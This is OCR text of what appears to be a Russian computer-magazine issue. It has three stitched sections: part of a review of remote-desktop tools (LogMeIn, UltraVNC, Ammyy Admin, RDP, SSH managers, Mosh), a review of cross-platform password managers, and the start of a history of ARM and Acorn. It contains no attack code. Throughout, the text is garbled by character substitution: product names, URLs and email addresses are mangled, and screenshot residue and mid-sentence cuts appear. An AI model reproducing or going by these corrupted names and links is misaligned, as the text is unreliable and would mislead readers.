доступ через браузер. Суть в следующем: поль- 
зователь, который хочет, чтобы ты настроил его 
комп, создает ссылку-приглашение, затем пере- 
дает ее любым удобным способом тебе (по етаіі, 
по скайпу и так далее). Ссылка-приглашение дей- 
ствительна определенное время (время назнача- 
ет удаленный пользователь), даже если ссылку 
кто-то подсмотрит, он вряд ли сможет ей восполь- 
зоваться после истечения срока годности. 



Давай рассмотрим, как создать приглаше- 
ние и как его использовать. В разделе «Общий 
доступ к рабочему столу» выводятся текущие 
приглашения. Нажав кнопку «Отправить при- 
глашение», ты можешь сгенерировать ту самую 
ссылку. Мастер создания приглашения позволя- 
ет определить длительность приглашения и спо- 
соб отправки приглашения (можно отправить 
по электронной почте ссылку или получить ссылку 
и отправить ее вручную). Потом эту ссылку нужно 
отправить гостю. Когда он скопирует ее в браузер 
и откроет, то увидит экран приглашения. Гость мо- 
жет или полностью управлять компьютером, или 
только просматривать рабочий стол. 

Выводы: 

+ Не требует прав администратора. 

+ Не требует настройки брандмауэра. 

+ Удаленный доступ через браузер. 

+ Мобильные клиенты. 

- Несколько необычный принцип работы. 





I ф Начало работы ПобПО ППЖЯП ОПЯТЬ В 1 ОЛМРІП 


Ы Обзор 

а» Общий доступ к рабочему столу 
в) Общий дос туп к файлам 




1 Г> Параметры 
Ѳ О програнно 


и р р 







Рис. 11 . Основное окно ЬодМеІп 



Рис. 12. Как подключиться к этому ПК 



Рис. 13. Удаленное управление через браузер 
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иИПАѴЫС/ПЕАІѴЫС(ГРЕЕѴѴАРЕ) 

ѴІ\ІС (ѴігШаІ Ыеіѵѵогк Соплрийпд) — система 
удаленного доступа к рабочему столу компью- 
тера, использующая протокол РЕВ (Ретоіе 
ЕгатеВиТСег). В ѴѴіпсІоѵѵз сервер можно поднять 
в ШгаѴІМС ( иѵпс.сот ) или ЕІеаІѴІЧС ( геаіѵпс.сот ). 
Программы похожи, поэтому рассмотрим только 
ШгаѴІМС. 

При установке можно установить как ѴІМС- 
сервер, так и клиент. На твой компьютер, если 
к нему не нужен удаленный доступ, ѴІМС-сервер 
можно не устанавливать. При установке сервера 
можно настроить его для запуска в виде систем- 
ной службы, но для этого нужны права админа. 
Протокол РЕВ, который использует ѴІМС, обычно 
подразумевает использование портов 5900- 
5906. Следовательно, для соединения по ѴІМС 
нужно настраивать брандмауэр, иначе он «заре- 
жет» соединение. 

Для подключения к ѴІМС-серверу использует- 
ся программа ШгаѴІМС Ѵіеѵѵег. Программа уни- 
версальна, и ты можешь использовать ее для под- 
ключения к любому ѴІМС-серверу, а не только 
к тому, на котором запущен ШгаѴІМС Зегѵег. 
Аналогично к серверу, созданному программой 
ШгаѴІМС Зегѵег, можно подключиться програм- 
мой ВоуаІТЗ или любым другим ѴІМС-клиентом. 

Пару слов о том, как это все работает. Сна- 
чала запускаем программу ШгаѴІМС ЕШ ЗеИіпдз 
и на вкладке ЗесигИу задаем пароль для доступа 
к ѴІМС-серверу, затем нужно запустить програм- 
му ШгаѴІМС Зегѵег. После на другом компьютере 
запускаем ШгаѴІМС Ѵіеѵѵег (рис. 14) и вводим ІР 



ІІКгаѴМС Ѵіеѵѵег - ѴѴІп32 1.1.9.1 



Ѵ?МС Зегѵег: 

( Но$Ыі$рІау ог Ьозі: :роП ) 

Оиіск Орйопз 

® АІГГО (Аиіо зеіесі Ьез* зеИпдз) 

© ІЛ.ТЯА (>2МЫ1/з) - ЕхрегітепіаІ 

© ЦУМ (> ІМЬіІ/з) * Мах Соіогз 
© МЕОІІІМ (128 - 256КЫ1/5) - 256 Соіогз 
© МОЭЕМ (19 - 128КЫ1/3) - 64 Соіогз 
© 5ЮѴѴ (< 19кКЬі1/з) - 8 Соіогз 
© МАШАІ. ( 1)5е орйопз ЬиКоп ) 

[Г] Ѵіел' Опіу О Аиіо Зсаііпд О СопАгт Ехіі 

О ІІзе ОЗМРІидіп № РІидіп гіеіесіегі... ▼ [ Сопйд | 

[г] Ргоху/Ререаіег 

[ 1. 1366 х 768 0,0 - 32-Ы1 - 60 Нг 

О 5аѵе соппесйоп зе№пдз аз сіе^аиіі [ Реіеіе заѵесі 5е№пд5~| 



Рис. 14. ШІгаѴЫС Ѵіеѵѵег 

компа, на котором установлен ѴІМС-сервер, и на- 
жимаем кнопку Соппесі;. 

Выводы: 

- Нужны права админа, нужно настраивать 
брандмауэр. 

+ Один и тот же протокол можно использовать 
для управления ѴѴіпсІоѵѵз, ОЗ X и І_іпих, но это 
преимущества не конкретной программы, 
а самой ѴІМС. 



- в 



Соппесі 



СапсеІ | 



[орЕопз... | 




АММѴѴ АОМШ (ЕВЕЕѴѴАПЕ) 

Аплтуу Асітіп ( ѵѵѵѵѵу.аттѵѵ.сот/гіЛ — еще одна 
программа для удаленного доступа к рабочему 
столу. Программа хороша тем, что она абсолютно 
бесплатна, совсем нетребовательна к ресурсам 
(исполнимый файл вообще занимает смешные 
700 Кб), позволяет организовать как обычный 
удаленный доступ к рабочему столу, так и со- 
единение в стиле удаленного офиса, не требует 
установки и изменения параметров брандмау- 
эра. С остальными возможностями программы 
ты сможешь ознакомиться на сайте разработчи- 
ков. 



АЫѴѴѴН Е В ЕТ5 (ЕВЕЕѴѴАПЕ) 

АпуѵѵИегеТЗ ( апѵѵѵііегеіз.зоигсеіогае.пеі: ) позво- 
ляет конвертировать компы в тонкие клиенты. 
Основное назначение этой программы отнюдь 
не удаленный доступ из соображений техниче- 
ской поддержки, как во всех ранее описанных 
программах, хотя ее тоже можно использовать 
для этого. АпуѵѵагеТЗ позволяет дать вторую 
жизнь старым компам, которые будут использо- 
ваться как тонкие клиенты — подключаться к сер- 
веру, и уже на нем будут выполняться программы, 
которые физически невозможно запустить на ста- 
рых ПК. 



УДАЛЕННЫЙ ДОСТУП ВѴѴШООѴѴ88 



Свойства системы 



На «сервере» (то есть на компе, к которо- 
му планируется удаленный доступ) нужно 
выполнить следующие действия: 

• Запусти ЗузІетРгорегІіезЕІеплоІю.ехе. 

• Включи флажок «Разрешить подклю- 
чения удаленного помощника к этому 
компьютеру». 

• Включи переключатель «Разрешить 
удаленные подключения к этому ком- 
пьютеру» и нажми «Применить». 

• Если используется энергосберегаю- 
щий режим, нужно настроить комп, 
чтобы он не уходил в спящий режим. 

На своем компе используй приложе- 
ние «Подключение к удаленному рабоче- 
му столу» для подключения к удаленному 
компу. 




Рис. 15. Разрешение удаленного 
доступа 



ВМЕСТО ЗАКЛЮЧЕНИЯ 




ШРО 

Еще одно средство 
отЗоодІе: СИготе 
ВетоІеОезкІор, 
плагин для СИготе 
( )■ 



Программ для удаленного доступа очень много. Как я, надеюсь, показал, самый привычный инструмент 
не всегда самый эффективный. Нужно отталкиваться от условий конкретной задачи, целевых платформ 
и других факторов. Надеюсь, теперь я окончательно прояснил всю картину удаленного доступа в твоей 
голове. Все предложения и пожелания можешь отправлять на сИізіІаЬз@таіІ.ги . □□ 



$$Н-Д0СТУП 

Классикой удаленного доступа остается 
ЗЗН. Казалось бы, что тут можно еще 
придумать? Ну например, что делать, 
если у тебя много удаленных машин? 
Прописывать алиасы для каждой? Есть 
специальные утилиты, позволяющие бы- 
стро переключаться между машинами. 

Один из таких менеджеров в І_іпих — 
Споте Соппесйоп Мападег ( киШиІи. 
сот/аст ). Программа очень удобна, 
настоятельно рекомендуем. 

В ѴѴіпсІоѵѵз для этой цели исполь- 
зуется АіДоРиПѴ — оболочка для по- 
пулярного ЗЗНДеІпеі-клиента РиПУ 
скачать которую можно по адресу: ѵѵѵѵѵѵ. 
г4біиз.пе1:/аи1:оои1:1:ѵ . Аналогичный ме- 
неджер ЗЗН-соединений есть и для ОЗ 
X — ЗІіийІе ( ШозѴ/аіШиЬ.сот/ііігІтеѵ/ 
зІжШе). 

Для мобильных платформ можно ис- 
пользовать мобильные ЗЗН -клиенты — 
Ргоплрі (ЮЗ) и СоппесІВоі (АпсІгоісІ). 
Ссылки и скриншоты ты без проблем 
найдешь в Сети. 

МОЗН (МОВИЕ 
$НЕШ: ХОРОШАЯ 
АЛЬТЕРНАТИВА 
ДЛЯ ЗЗН 

Мозіі ( тозіі.тіі.есіи ) тоже можно ис- 
пользовать для удаленного доступа 
к консоли (то есть ты сможешь удаленно 
выполнять команды и будешь видеть 
их результат). Основное преимущество 
Мозіі над ЗЗН — возможность роуминга, 
то есть смены сети на клиентской 
машине, что полезно в дороге, когда 
сеть может меняться (сейчас она со- 
товая, через несколько минут — ѴѴі-Еі, 
при этом меняется ІР, но соединение 
остается). Часто путешествующие адми- 
ны оценят это по достоинству. Но есть 
один большой недостаток: к обычному 
ЗЗН-серверу Мозіі не подключится, 
то есть на сервере придется устанавли- 
вать Мозіі. Зато Мозіі работает не в виде 
демона, как ЗЗН, а как обычная про- 
грамма, то есть для ее запуска не нужен 
гооі-доступ. Мозіі доступен для многих 
дистрибутивов Ыпих и ВЗР, ОЗХ, ЮЗ 
(в составе популярного клиента ІЗЗН) 
и АпсІгоісІ. 



600СІ.Е НАМ601ЛЗ: 
ШЕРИНГ ЭКРАНА 
И ВИДЕОКОНФЕРЕНЦИИ 

Как крайнюю меру можно исполь- 
зовать новый сервис от Соодіе — 
Напдоиіз ( аооаІе.сот/+/Іеагптоге/ 
Ііапаои1:з/?ІіІ-ги ). Он позволяет устра- 
ивать видеовстречи, во время которых 
пользователи могут демонстрировать 
друг другу свой экран. При желании 
можешь ознакомиться с этим сервисом 
самостоятельно. 
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Обзор кросс-платформенных 
менеджеров паролей 



Если ты читаешь этот журнал, ты наверняка в кур- 
се базовых правил безопасности в Сети и следу- 
ешь им. Ты придумываешь для каждой учетной 
записи отдельный пароль и стараешься использо- 
вать максимально сложные комбинации. Уверен, 
ты уже давно работаешь с каким-нибудь менедже- 
ром паролей. Но и этого становится мало — ведь 
у тебя, скорее всего, куча компьютеров, браузеров 
и мобильных устройств. И после каждого громкого 
взлома ты бросаешься менять все что только мож- 
но. Как сделать свою жизнь чуточку проще? 





I 



Современный менеджер паролей — это уже 
не просто программа для хранения паролей в за- 
шифрованном виде. От такой программы требу- 
ется поддержка мобильных платформ, браузер- 
ные плагины, методы безопасной синхронизации 
пользовательских данных и многое другое. Са- 
мые продвинутые программы умеют, например, 
предупреждать пользователя о том, что где-то 
что-то взломали и нужно поменять свой пароль. 
В общем, пространство для фантазии разработ- 
чиков огромно, и неудивительно, что некоторые 
из представленных в обзоре менеджеров успеш- 
но продаются за десятки долларов. 





КЕЕРА$8 



кееразз.іпіо 

Ыпих, Мае, \Л/іп / АпсІгоісІ, ЮЗ, \Л/іп РНопе 

КееРазз — Ыпих среди менеджеров паролей, опен- 
сорсный и буквально напичканный функциями. Офи- 
циальная реализация есть только подѴѴіпсіоѵѵз, но ис- 
ходники открыты под СРІ_ѵ2, поэтому есть огромное 
количество реализаций, в том числе под Ыпих и под 
05 X, например КееРаззХ. Также есть приложения 
и для мобильных ОС. Полный список неофициальных 
реализаций есть на странице проекта ( кееразз.іпіо/ 
боѵѵпіоасі.іііппі ). 

База данных паролей шифруется с помощью 
симметричного АЕЗ-256, а мастер-пароль хеширует- 
ся с 5НА-256. В качестве синхронизации обычно ис- 
пользуют либо старую добрую флешку, либо один из 
облачных сервисов, например ЭгорЬох. Некоторые 
мобильные клиенты, кстати, умеют с хранилищем 
в ОгорЬох работать автоматически. 

Для КееРазз есть куча плагинов и дополнитель- 
ных инструментов: утилиты для импорта/экспорта 
паролей из БД, браузерные плагины, позволяющие 
автоматом заполнять формы логина, и дополнитель- 
ные средства бэкапа и синхронизации. Все это со- 
брано на отдельной странице ( кееоазз.іпіо/оіиаіпз. 
ЬІШІ). 

К сожалению, у такого зоопарка клиентов есть 
и минусы. Сейчас используется две версии (1 и 2) 
базы данных, несовместимых друг с другом. При 
этом есть клиенты, поддерживающие только одну 
из версий. Несмотря на то что основное приложение 
бесплатно, существуют и платные клиенты, напри- 
мер под ЮЗ. Как это часто бывает с подобными про- 
ектами, интерфейс у некоторых клиентов оставляет 
желать лучшего. 





1 РА55ѴѴ0В0 

ааіІеЬііз.сот/операззѵѵогсІ 
ѴѴіп, Мае / АпсІгоісІ, ЮЗ 

Этот клиент от АдіІеВііз уже заслужил популяр- 
ность у многих пользователей. Первое, с чем 
сталкиваешься при работе с ним, — неверо- 
ятно продуманный до мелочей и удобный ин- 
терфейс. При добавлении нового веб-сервиса 
программа автоматически скачивает его икон- 
ку и делает скриншот главной страницы. 

В комплекте с приложением также есть воз- 
можность установки браузерных 
клиентов. Они позволяют автома- 
тически добавлять новые паро- 
ли в базу (подобно встроенным 
в браузер функциям запоминания 
паролей), а также автозаполнения 
форм с логином. 

База данных, начиная с этого 
года, теперь зашифрована с АЕЗ- 
256. В качестве синхронизации 
доступны два варианта: РгорЬох 



и ЮІоисІ. Как в приложении, так и в плагинах есть 
также удобный генератор безопасных паролей. 

Дополнительно можно отметить рогіаЫе- 
версию, написанную на 05 и НТМІ_, которая 
работает в браузере. Подробней о ней на- 
писано на официальной странице ( Ііеіо.ааііе. 
ѵѵз/1 РаззѵѵогсІЗ/1 оаззѵѵогсіапѵѵѵііеге.іііті ). 

Поскольку разработчик пришел из мира 
Арріе, есть свои нюансы. Например, высокая 
цена: десктопное приложение стоит около 50 
долларов. 

Под Ыпих клиента нет вообще, а в АпсІгоісІ 
1 РаззѵѵогсІ умеет только просматривать паро- 
ли, а не редактировать их или добавлять новые. 







Зітір — еще один интересный менеджер паро- 
лей от компании 2еІейс. Простой и легковесный, 
при этом умеет все что нужно от менеджера па- 
ролей, но не более. Поддерживает платформы 
ѴѴіпсІоѵѵз и ОЗ X. В списке мобильных платформ: 
АпбгоісІ и ЮЗ. 

База данных паролей хранится в ЗОЫіе 
и шифруется АЕ5-256 с помощью дополнения 
ЗОЮірІіег (зсЦсщЬегпеі)- Синхронизация между 
клиентами происходит либо через облачное хра- 
нилище (на выбор: Соодіе Огіѵе или ОгорЬох), 
либо через ѴѴі-Рі. 

Клиенты приложения платные, но цена (в от- 
личие от 1 РаззѵѵогсІ, например) вполне призем- 
ленная: мобильные клиенты стоят по 5 долларов, 
десктопные — по 10. 

Из явных минусов можно отметить, что на дан- 
ный момент нет возможности интеграции Зігір’а 
с браузерами для автоматического ввода паро- 
ля — весьма полезного функционала и защиты 
от кейлоггеров. Правда, авторы сообщают, что ра- 
бота над дополнениями идет полным ходом, так 
что через некоторое время можно ожидать полно- 
функциональный менеджер паролей. 

Также на форуме разработчиков упоминалось 
про планы запустить Ыпих-приложение. 

ѣ 2:34 
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ѵѵѵѵѵѵ.сІазЫапе.сот 
Мае, ѴѴіп / АпбгоісІ, ЮЗ 

ОазИІапе — довольно молодой менеджер паролей с ак- 
тивным желанием быть лучшим и самым безопасным 
среди себе подобных. И действительно, у него очень при- 
ятный интерфейс, поддержка различных операционок 
(к сожалению, І_іпих тут тоже в пролете) и адекватная цена. 

Пароли в базе данных хранятся шифрованными АЕЗ- 
256. Есть возможность синхронизации через собственное 
дашлэйновское облако. Одна из самых классных фич — 
возможность использовать двухфакторную аутентифика- 
цию через Соодіе АиШепІісаІог, что позволяет повысить 
защищенность данных. Также есть всякие приятные ме- 
лочи, типа дашборда безопасности, в котором выводится 
сводная информация по паролям, или довольно строгие 
требования к мастер-паролю (разный регистр, цифры, 
минимум восемь символов). Есть также возможность веб- 
доступа к паролям. 

В стандартной поставке также присутствуют браузер- 
ные плагины, работающие привычным способом — по- 
зволяющие автоматически заполнять известные формы 
и сохранять результаты введенных паролей. 

Интересна также и ценовая политика компании. 
Во-первых, все устанавливаемые приложения бесплат- 
ны, а оплачиваются услуги пользования сервисом. Во- 
вторых, есть бесплатный тарифный план (без синхрони- 
зации, бэкапов и веб-доступа), а есть премиум, стоящий 
вполне адекватные 20 долларов в год. 

Из минусов можно отметить отсутствие полноценного 
клиента под І_іпих и слегка раздражающий логотип в каж- 
дом поле ввода, которые добавляет браузерный плагин. 



✓^сІазМапе 

РАЬ ѴоигзесиГОузсоге: 

; 95 . 0 % 

В Зирег заіе! 

Со Ьг 100% апй 81ау от юр оі №іе дате 
ж№ йіезе диіек иіпз: 

РЕИ 

І 5 % 

АсНѵаІе Соодіе 
Аитѳпйсаіог іо дѳ» еѵеп 






' 




мѵиосш 




І.А8ТРА88 



Іазіоазз.сот 

Мае, \Л/іп, Ыпих / АпсІгоісІ, ЮЗ,\Л/іп РНопе 

І_аз1:Разз — довольно старый менеджер паролей. 
Примечательно, что у него, по сути, нет клиентского 
приложения. Весь функционал по управлению па- 
ролями реализован через веб-приложение и через 
браузерные плагины. Но, несмотря на это, сервис 
в плане функционала довольно мощный. Доступна 
возможность обмена паролями с друзьями. 

База данных с паролями шифруется с помощью 
АЕ5-256 и синхронизируется между хранилищем 
плагина и сервером ЬазІРазз. Есть также рогіаЫе- 
версии, причем как браузерных плагинов, так и са- 
мостоятельного приложения под ѴѴіпсІоѵѵз. 

Также стоит отметить, что родные приложе- 
ния есть для любой мобильной платформы (в том 
числе ѵѵеЬОЗ или ЗуплЫап). Более того, например, 
для АпсІгоісІ есть как отдельное приложение, так 
и плагин для браузера ОоІрТііп. 

В плане стоимости все просто, есть возмож- 
ность бесплатного использования, есть дополни- 
тельные платные функции. Премиум-аккаунт стоит 
доллар в месяц или 12 долларов в год. 

Вообще, от сервиса остаются спорные ощуще- 
ния. С одной стороны, он довольно широко рас- 
пространен и есть возможность использовать его 
на всех мыслимых и немыслимых платформах. 
С другой стороны, сервис разрабатывался доволь- 
но давно и на сегодняшний день нет впечатления 
лоска, присущего более молодым менеджерам па- 
ролей. 




ИНозѴМѵѵѵѵ.тѵІІоаіп.сот/сопіепі/іпсІех.оІіо 
Мае, \Л/іп, Ыпих / АпсІгоісІ, ЮЗ, ѴѴіп РНопе 

МуІІодіп — это стартап, чем-то похожий на І_азІРаз5, 
но с прицелом на шаринг паролей. В основе лежит 
веб-приложение, с возможностью редактировать па- 
роли, а для сохранения их из форм и автоматического 
ввода существует яваскриптовый букмарклет. Основ- 
ной киллер-фичей менеджера паролей является груп- 
повая работа с паролями: есть возможность создавать 
несколько аккаунтов внутри организации, есть воз- 
можность управлять доступом различных лиц к опре- 
деленным паролям. Такой юзкейс подойдет в первую 
очередь небольшим группам, которые имеют внутри 
себя определенную базу реквизитов. В данном случае, 
например, после плановой смены пароля к опреде- 
ленному сервису отпадет необходимость в сообщении 
новых данных каждому пользователю. Это все-таки 
немного безопасней, чем хранить список где-нибудь 
в вики. Также стоит отметить интересную двухступен- 
чатую авторизацию. 

К сожалению, у данного проекта нет обширной ин- 
фраструктуры, присущей «взрослым» менеджерам па- 
ролей. Нет мобильных приложений, нет возможности 
работать с базой паролей офлайн. Браузерные плаги- 
ны также удобней букмарклета: они сами могут обнов- 
ляться и реализовывать более удобный интерфейс. 

Поэтому будем надеяться, что МуІІодіп найдет 
своего пользователя и сможет восполнить пробелы 
в сервисе. 






ВШЕРА88 

ШозУ/Ыиеоазз.ога 
Мае, Ыпих 



Автор программы ВІиеразз решил 
создать еще один менеджер па- 
ролей, скомбинировав при этом 
плюсы уже существующих решений 
и учтя их минусы: 

• открытые под СРІ_ѵЗ исходники 
повысят доверие к менеджеру 
и помогут сформировать комью- 
нити разработчиков; 

• реализация на питоне, которая 
позволит сделать кросс-плат- 
форменное приложение для дес- 
ктопных клиентов; 

• мобильные приложения позво- 
лят работать с базой паролей 
без компьютера под рукой; 



• синхронизация через Р2Р по- 
зволит избежать затрат на со- 
держание «облака» и снизит 
вероятность массовой утечки 
реквизитов. 

Все это выглядит очень много- 
обещающе, если бы не одно «но»: 
пока большая часть функционала 
находится исключительно в планах. 
На данный момент есть неплохая 
реализация, работающая и син- 
хронизирующаяся под Ыпих и ОЗ X. 
Автор предлагает в лучших тради- 
циях краудфаундинга заинтересо- 
ванным пользователям скинуться 



деньгами, позволив ему посвятить 
проекту 100% рабочего времени. 
В качестве конечной цели установ- 
лена планка в 60 000 долларов (что, 
надо заметить, весьма немало). 
Весь проект выложен на гитхаб, 
поэтому за ходом разработки мож- 
но следить. Справедливости ради 
надо заметить, что темпы разра- 
ботки на данный момент вряд ли 
можно назвать вдохновляющими. 

В любом случае заявленный 
функционал выглядит достаточ- 
но «вкусно», поэтому имеет смысл 
к данному менеджеру паролей при- 
смотреться повнимательней. 
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КАК НАЧИНАЛСЯ 




Маленькая британская компания , подарившая 
миру мобильную революцию 

Новый фаворит в гонке процессорных вооружений — фирма не из Кремниевой 
долины, а из английского научного городка Кембридж. Однако ее успех — вещь 
вовсе не внезапная, и за ним стоит история длиной в тридцать лет. 




Андрей Письменный 

арізтеппу@дтаіІ.сот 



Б ок о бок с ІпѣеІ мы живем еще с вось- 
мидесятых годов — имя этой компа- 
нии встречается в новостях так часто, 
что название нынешнего поколения 
ее процессоров нередко известно 
даже далеким от техники людям. Но времена 
изменились, и планшеты со смартфонами стали 
потихоньку отбирать внимание и пользователей 
у персоналок, а отливают их ядра вовсе не на фа- 
бриках ІпіеІ. На передний план внезапно вышла 
британская компания АРМ, о которой до недав- 
них пор слышали лишь специалисты. Что за люди 
стоят за созданием процессоров, давших дорогу 
новому поколению компьютеров? 

Формально фирма АРМ Ноісііпдз была соз- 
дана в 1990 году, а конкретнее — в тот момент, 



когда было подписано соглашение между тремя 
компаниями: Арріе Сотриіег, Асогп Сотриіегз 
и ѴІ_5І Тесііпоіоду. Арріе в представлении не нуж- 
дается, а вот об Асогп и ѴІ_5І стоит поговорить 
подробнее. 

КЕМБРИДЖСКИЙ ЖЕЛУДЬ 

История Асогп связана с другой известной бри- 
танской компанией — Зіпсіаіг РезеагсИ, где был 
создан небезызвестный компьютер IX Зресітипл. 
Будущий сооснователь Асогп Крис Карри сделал 
свою карьеру именно в Зіпсіаіг Расііопісз (позд- 
нее — РезеагсИ). В те времена Карри и Синклер 
были друзьями и вместе работали над кар- 
манным калькулятором и другими проектами, 
но в 1978 году во время подготовки прототипа 



7Х 80 (одного из предшественников 7Х Зресішт) 
они так сильно разошлись во мнениях относи- 
тельно будущего компьютера, что Карри поки- 
нул Синклера и его компанию. А вскоре основал 
собственную — совместно с предпринимателем, 
изобретателем и инвестором Германом Хаузе- 
ром. Фирма называлась СатЬгісІде Ргосеззог 
ІІпіІ, или просто СРІІ. 

Хаузер к тому времени уже успел завербовать 
одного гениального студента Кембриджского 
университета — Роджера Уилсона. Тот был бук- 
вально влюблен в электронику, на память цитиро- 
вал справочники компонентов и писал программы 
в машинных кодах без единой ошибки — по край- 
ней мере такова легенда. Опыт настоящей работы 
у Уилсона был небольшой — за ним числилось 





разве что создание автоматизированной кор- 
мушки для коров на основе чипа МОЗ Тесііпоіоду 
6502. Но когда Хаузер предложил Уилсону поуча- 
ствовать в создании электронной записной книж- 
ки (которая так потом и не появилась на свет), тот 
немедленно согласился. 

Карри привел с собой в новую фирму еще од- 
ного студента Кембриджа — второкурсника Сти- 
ва Фербера. Фербер, как и Карри, ранее работал 
на Синклера и занимался разработкой набора 
МК14, из которого любой желающий мог собрать 
простенький домашний компьютер. Первое вре- 
мя Ферберу приходилось совмещать работу 
в СРІІ с учебой, но зато у него не было никаких 
сомнений в том, что после получения диплома 
он сможет продолжать заниматься любимым де- 
лом — придумывать компьютеры. 

В 1979 году СРІІ был переименован в Асогп 
(что переводится как «желудь»), якобы чтобы 
числиться в телефонном справочнике до Арріе. 
Но самое главное — фирма в тот год выпустила 
свой первый продукт, Асогп Зузіепл 1. Это был 
очень скромный компьютер для научных расче- 
тов, имевший однострочный ЖК-дисплей и про- 
дававшийся за 80 фунтов стерлингов. Для срав- 
нения, 1X80, тоже считавшийся экстремально 
дешевым, в сборе стоил сотню. 

Настоящий успех ждал Асогп двумя годами 
позже, когда совместно с ВВС (да-да, той самой 
Британской широковещательной корпорацией, 
что по сей день снабжает весь мир своими ново- 
стями и сериалом «Доктор Кто») Карри и Хаузеру 
удалось выиграть тендер на поставки компью- 
теров в британские школы, — так родился ВВС 
Місго. Клайв Синклер тоже участвовал в тендере 
и был настолько взбешен поражением, что напал 
на своего бывшего друга и коллегу Криса Карри 
в одном из кембриджских пабов и отхлестал его 
свернутой в трубочку газетой. 

СВЕРХБОЛЬШИЕ ИНТЕГРАЛЬНЫЕ 
СХЕМЫ 

В то время как индустрия переживала бум до- 
машних компьютеров, в научной части отрасли 
происходили другие, не менее захватывающие 
события. Одно из них имеет непосредственное 
отношение к появлению АРМ. 

Общеизвестно, что интернет был приду- 
ман в Агентстве по перспективным оборон- 



ным научно-исследовательским разработкам 
США (ЭАВРА), однако это не единственный про- 
ект ЭАВРА, оказавший мощное влияние на всю 
индустрию. ѴІ_ЗІ Ргоіесі; как раз из таких разрабо- 
ток: его относительно малая известность просто 
несоизмерима с его важностью. ѴІ_5І расшиф- 
ровывается как Ѵегу-Іагде-зсаІе іпіедгаііоп — 
сверхбольшая интегральная схема, или СБИС. 
В начале восьмидесятых все шло к переходу 
на такие схемы, но при их разработке инженеры 
столкнулись с серьезными проблемами. 

С ростом числа транзисторов, умещающихся 
на кристалле интегральной схемы, проектировать 
процессоры становилось все сложнее, и, когда 
число транзисторов стало превышать сотню ты- 
сяч, старые методы начали приводить к появле- 
нию ошибок. Требовался новый способ проекти- 
рования, и вряд ли кого-то удивит, что решение 
заключалось в использовании компьютера. 

Профессор Калифорнийского технологи- 
ческого института Карвер Мид и программист 
из лаборатории Хегох РАПС Лин Конвей пред- 
ложили создать систему автоматизированного 
проектирования (САПР), которая бы помогала 
делать процессоры фактически любой слож- 
ности. На тот момент для работы с такой про- 
граммой понадобился бы суперкомпьютер, так 
что ЭАВРА пришлось профинансировать не толь- 
ко создание САПР, но и все вокруг: разработку 
рабочих станций и даже операционной систе- 
мы. Позднее из этих проектов вырастут фирмы 
5ип Місгозузіеплз и Зііісоп СгарИісз, а в качестве 
ОС будет создана новая ветвь II N IX — Вегкіеу 
ЗоТіѵѵаге Эі5ІгіЬи1:іоп(ВЗО). 

Мид и Конвей полагали, что если разработ- 
ка процессоров будет лучше автоматизирова- 
на, то делать их смогут небольшие фирмы или 
даже студенты в ходе обучения. Идея оказалась 
не только верной, но и очень удачной: с помощью 
новых инструментов процессоры стало намного 
легче проектировать и появилась возможность 
делать это в отрыве от производства. Мало того, 
новый софт позволил выявить доселе скрытые 
особенности строения процессоров. 

Ш8С - БЛАГОРОДНОЕ ДЕЛ О 

Современные процессорные архитектуры приня- 
то делить на два класса: СІЗС (Сотріех Іпзігисііоп 
Зеі: СотриНпд — вычислители с комплексным на- 



бором команд) и ВІЗС (ВебисесІ ІпзІтисИоп Зеі: 
СотрЩіпд — вычислители с сокращенным набо- 
ром команд). Между этими подходами есть прин- 
ципиальная разница, но появилась она не сразу. 

Ранние восьмибитные процессоры вроде 
Іпіеі 8080 или Моіюгоіа 6800 умели исполнять 
всего несколько простых инструкций. Например, 
не было специальной инструкции для перемно- 
жения чисел, это действие требовало нескольких 
процессорных команд — смещений и сложений. 
Такой подход кажется неудобным, и потому ре- 
шение добавить более емкие инструкции было 
интуитивным. 

Считалось к тому же, что операции, вопло- 
щенные непосредственно в железе, будут ис- 
полняться намного быстрее, чем выполненные 
в виде программ. Так что в последующих раз- 
работках создатели процессоров стали добав- 
лять поддержку все новых и новых инструкций. 
Перемножение двух чисел, к примеру, превра- 
тилось в одну команду, зато устройство микро- 
схемы усложнилось, поскольку стало включать 
в себя отдельную подсистему, предназначен- 
ную для умножения. Так появились процессоры 
с комплексным набором команд. К этому семей- 
ству относятся и последующие чипы Іпіеі, и дру- 
гие процессоры, пользовавшиеся популярно- 
стью в 80-е годы. 

Не сказать, что у комплексного набора ко- 
манд нет своих достоинств, но за них пришлось 
заплатить хорошую цену. Если первые процес- 
соры за один тик генератора тактовой частоты 
выполняли одну простую инструкцию, то более 
сложные инструкции стали требовать по не- 
сколько тактов. 

В рамках все того же проекта ѴІ_ЗІ профессор 
Калифорнийского университета в Беркли Дэвид 
Паттерсон провел исследование, в ходе которо- 
го нащупал иной подход к процессоростроению, 
который он назвал ВІЗС. Выяснилось, что если 
ограничить набор инструкций лишь теми, которые 
могут быть исполнены за один такт, то можно уве- 
личить скорость их исполнения и таким образом 
повысить общую производительность. Житейская 
логика подсказывает, что такого быть не должно: 
программы ведь получаются длиннее! Но когда 
речь идет о системах из сотен тысяч компонентов, 
житейская логика может отдохнуть, а верный от- 
вет дадут моделирование и симуляция. 
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Агсііітесіез — первый компьютер с процессором АРМ 



Заодно Паттерсону удалось значительно 
снизить влияние «бутылочного горлышка» фон- 
неймановской архитектуры — медленного кана- 
ла между процессором и оперативной памятью. 
ВІ8С отличается большим числом регистров, чем 
СІЗС, и это позволяет реже обращаться к опера- 
тивной памяти — в особенности если программа 
пропущена через оптимизирующий компилятор 
и выгодно использует ресурсы. Еще лучше такой 
подход работает в многоядерных или многопро- 
цессорных системах, где к одной и той же памяти 
обращаются несколько вычислителей. Чем реже 
они это делают, тем реже каждому из них прихо- 
дится ждать своей очереди и, соответственно, 
тем больше прирост производительности. 

П О ЗАКОНУ «АРХИ М ЕДА» 

Вернемся, однако, к истории Асогп. Если не счи- 
тать нелепой ссоры с отцом 2Х Зресітипл, дела 
у компании в 1983 году шли неплохо: ВВС Місго 
был продан полуторамиллиардным тиражом, 
и прибыль Асогп подскочила с трех тысяч фун- 
тов до почти девяти миллионов. Билл Гейтс даже 
предлагал Хаузеру портировать МЗ-йОЗ и фир- 
менный интерпретатор ВАЗІС на ВВС Місго, 
но Хаузер отказался. 

Команда собственных разработчиков Асогп 
росла, а учредители подумывали о том, что пора 
перейти на новый виток развития: вместо ком- 
пьютеров на основе восьмиразрядных чипов 
выпускать машины помощнее — с шестнадцати- 
разрядными ЦП. 

В качестве варианта рассматривались про- 
цессоры ІЧайопаІ Зеплісопсіисіюг, но Роберт 
Уилсон посетил израильскую штаб-квартиру 
этой компании и остался недоволен: «У них там 
